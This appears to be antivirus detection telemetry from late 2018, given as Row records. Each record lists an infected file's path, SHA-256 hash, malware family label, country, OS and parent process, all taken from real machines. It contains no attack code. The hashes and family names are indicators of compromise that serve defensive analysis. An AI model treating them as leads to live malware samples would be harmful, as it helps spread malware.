  Row(detection=Row(filename='avscan-20181102-050804-3f97e96a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050804-3F97E96A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051711-85fa94c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051711-85FA94C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050516-dba0f429', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050516-DBA0F429', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamcha.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Yamcha\\Yamcha.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='7b00a7a03c430bdb216adbbaed1fff14d4a5fb90194c28708dc1e11ea472b476', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060037-970b8fac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060037-970B8FAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051911-cd456ffe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051911-CD456FFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054404-472efa93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054404-472EFA93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062419-e6c2c169', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062419-E6C2C169', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062158-92e23da6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062158-92E23DA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054418-4fb1a015', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054418-4FB1A015', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:22:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051228-dd47ce2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051228-DD47CE2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055916-668828cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055916-668828CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052557-bf8b5f3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052557-BF8B5F3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060920-ce8241b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060920-CE8241B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062019-57aec800', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062019-57AEC800', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050857-5f189fb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050857-5F189FB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rvbff6vx.dll', filepath='\\?\\C:\\Windows\\rvbFF6Vx.dll', filesize=192000, name='Adware/ELEX.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:17:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155554-c0d42203', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155554-C0D42203', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smear 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\new\\PAP SMEAR 2015\\SMEAR 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:03:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh72ec.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH72EC.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:33:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154810-728ba01d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154810-728BA01D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155905-e0df61d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155905-E0DF61D2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sysprep.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\nightly.0\\Software\\OLD\\HP - Simulator\\Training Simulator\\18406- LAB Files\\ClassFiles\\Sysprep\\sysprep.exe', filesize=192000, name='W32/Sality.Y.#M1.#R1'), hash='4a964ebc488535678b61481ca220853d38ebc8ebceed96133d900cb0c73f75aa', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T08:35:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210659-25a142ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210659-25A142EC', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:06:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='laporan p2k3.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\LAPORAN P2K3\\LAPORAN P2K3.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T19:13:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dccw.exe', filepath='\\\\?\\C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='49193d4bc4b9c36d7276bbc3a7c76021644443d2de535350c021afbd38e41c30', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T13:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-004512-b0c2592d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_05b167eb\\AVSCAN-20181101-004458-A89A3C36\\AVSCAN-20181101-004512-B0C2592D', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='043263a827d1399a6a67c283c2dae406a399f7e976a95c897b20a5d70cefcd06', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:45:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155937-e64f3a38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155937-E64F3A38', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mdac_typ.exe', filepath='\\\\?\\D:\\SETUP TN\\Crtal 8.5\\V8.5\\REDIST\\IT\\MDAC_TYP.EXE', filesize=6636000, name='W32/Sality.AT.#M1.#R1'), hash='08be2734df3cfcd7dc5c69c851a58e49411d340cc7f30aaad88f18067e996b36', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='12edca008452e0cd91d29ad5ebe55c0c1613c64086103399acd8d0e5666c1e17', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\12EDCA008452E0CD91D29AD5EBE55C0C1613C64086103399ACD8D0E5666C1E17', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='12edca008452e0cd91d29ad5ebe55c0c1613c64086103399acd8d0e5666c1e17', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:44:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155455-3816d8be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155455-3816D8BE', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pengupahan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\PENGUPAHAN\\PENGUPAHAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gedung.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\PERBAIKAN GEDUNG\\GEDUNG.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lap.makan.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GAVANS\\LAP.MAKAN\\LAP.MAKAN.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105456-1c8d68ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105351-10D64745\\AVSCAN-20181101-105456-1C8D68AC', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-textscan_.exe', filepath='H:\\Restmüll 4\\Downloads\\Downloader-fuer-textscan_.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='76b9bd2286dc9573366783f5fe7d8d181484d5b3c98a61203f6515498a6efb9c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T19:55:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new3hwa5w0h.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\J0DWFXI3\\new3HWA5W0H.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='a19b91667cef0439ab9f76f7061bb7334a33bccaeeed0d86a837842c337265fe', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:28:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111310-0b3ae670', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111310-0B3AE670', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-01T23:02:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194608-6cc5d92d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_629030d5\\AVSCAN-20181101-194559-6AC47C76\\AVSCAN-20181101-194608-6CC5D92D', filesize=704000, name='TR/AD.Ursnif.B.#M1.#R1'), hash='a5be1422a8630735450dcd31e04170a358a767998249ddec3eeb521e111c431a', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:46:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freeyoutubetomp3converter(1).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter(1).exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:37:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nofel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nofel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6f6d5c58caebfd595b3cd4b494172b5506c28ea73f953d2c95849c9d581ea349', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T15:45:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='download_cache.exe', filepath='G:\\Android\\data\\com.google.android.googlequicksearchbox\\files\\download_cache.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:56:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082803-4ca36b0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181101-005657-94C4467B\\AVSCAN-20181101-082803-4CA36B0D', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='proquota.exe', filepath='H:\\WINDOWS\\system32\\proquota.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='dbee13babbd0d286409843bce9e061bb941743340142c733bd80e43dc5055804', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T08:49:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110702-dce1b694', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110702-DCE1B694', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:48Z'), dt=datetime.date(2018, 11, 1)),
